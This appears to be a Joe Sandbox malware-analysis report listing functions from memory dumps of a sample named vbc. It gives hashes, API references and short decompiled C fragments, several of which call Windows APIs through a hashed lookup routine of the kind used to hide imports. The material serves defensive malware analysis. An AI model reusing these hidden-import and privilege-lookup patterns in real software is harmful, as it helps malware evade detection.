Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 009FFAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFAF3

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 009FFBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFBC3

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 009FFB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFB73

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 009FFC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFC9B

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546

Uniqueness

Uniqueness Score: -1.00%

Function 009FFC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFC6B

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 009FFD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFD9A

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 009FFDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFDCB

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 009FFEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFEAB

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556

Uniqueness

Uniqueness Score: -1.00%

Function 009FFED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFEDB

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 009FFFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009FFFBF

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 0041A063, Relevance: 3.0, APIs: 2, Instructions: 41
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D

Memory Dump Source

Source File: 00000006.00000002.2224969781.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFree
String ID:
API String ID: 2488874121-0
Opcode ID: fc8b0230778f9a523952280d53f06c88ecd1858c27ec338bacfda5c4e7fcb47f
Instruction ID: 5f557b029e11bada605359a5f99de01afd947aa3c29bd9bf66219706785845a5
Opcode Fuzzy Hash: fc8b0230778f9a523952280d53f06c88ecd1858c27ec338bacfda5c4e7fcb47f
Instruction Fuzzy Hash: FAF049B1200208AFDB18DF59DC40DA777A9EF88324F15859AFD4DA7342C630ED648AB5

Uniqueness

Uniqueness Score: -1.00%

Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E004082F0(void* __ebx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr* _t26;
				void* _t27;
				void* _t31;

				_t31 = __eflags;
				_v68 = 0;
				E0041B860( &_v67, 0, 0x3f);
				E0041C400( &_v68, 3);
				_t12 = E0040ACD0(__ebx, _t31, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t22, 0x8003, _t27 + (E0040A460(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x004082f0
0x004082ff
0x00408303
0x0040830e
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x00000000
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000006.00000002.2224969781.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A960(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a07f
0x0041a087
0x0041a09d
0x0041a0a1

APIs

RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D

Memory Dump Source

Source File: 00000006.00000002.2224969781.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A030, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041A030(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				intOrPtr* _t8;
				void* _t10;
				void* _t15;

				_t8 = E0041A960(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				 *_t8 =  *_t8 + _t8;
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a047
0x0041a04a
0x0041a05d
0x0041a061

APIs

RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D

Memory Dump Source

Source File: 00000006.00000002.2224969781.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1CC, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E0041A1CC(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				_push(0x55631232);
				_t7 = _a4;
				E0041A960(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t7 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a1d0
0x0041a1d3
0x0041a1ea
0x0041a200
0x0041a204

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200

Memory Dump Source

Source File: 00000006.00000002.2224969781.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 93bf3472f148d7cfa4df09addfa3dff6db61b1b8d02715e25170bf561a52abb0
Instruction ID: 4b92f59effa1eb99280251b2d8be5d8c88d3ce5384f63f2953597b3b55148386
Opcode Fuzzy Hash: 93bf3472f148d7cfa4df09addfa3dff6db61b1b8d02715e25170bf561a52abb0
Instruction Fuzzy Hash: B2E01AB16002086BDB20EF85CC85EE737A9EF88650F018565BE4C6B242D934E9518BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1D0, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041A1D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a1ea
0x0041a200
0x0041a204

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200

Memory Dump Source

Source File: 00000006.00000002.2224969781.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0A3, Relevance: 1.5, APIs: 1, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E0041A0A3(intOrPtr _a4, int _a8) {
				signed char _t13;
				signed int* _t15;

				 *_t15 =  *_t15 | _t13;
				asm("sbb [esi+0x63], esi");
				_t5 = _a4;
				E0041A960(_t15, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x0041a0a5
0x0041a0aa
0x0041a0b3
0x0041a0ca
0x0041a0d8

APIs

ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A0D8

Memory Dump Source

Source File: 00000006.00000002.2224969781.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: c00ec0217a9372d057129489f66f7308e62e057ba5daf022152166e778e5c445
Instruction ID: fc2788715a2a81ea8a36826f9f8f2812d298ba076e0ddc51bc585758f887f444
Opcode Fuzzy Hash: c00ec0217a9372d057129489f66f7308e62e057ba5daf022152166e778e5c445
Instruction Fuzzy Hash: 74E04F756182046BD724DB68CCC5EC33BA89F59750F158599B989AB341C231AA14CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0B0, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A0B0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041A960(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x0041a0b3
0x0041a0ca
0x0041a0d8

APIs

ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A0D8

Memory Dump Source

Source File: 00000006.00000002.2224969781.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: eb2c75e7f7166c4cf28644cd9339eacac336c717648a3dafe3de7fd5e277bb7f
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 4CD017726102187BD620EB99CC85FD777ACDF48BA0F0584A9BA5C6B242C531BA108AE1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00A010D0, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
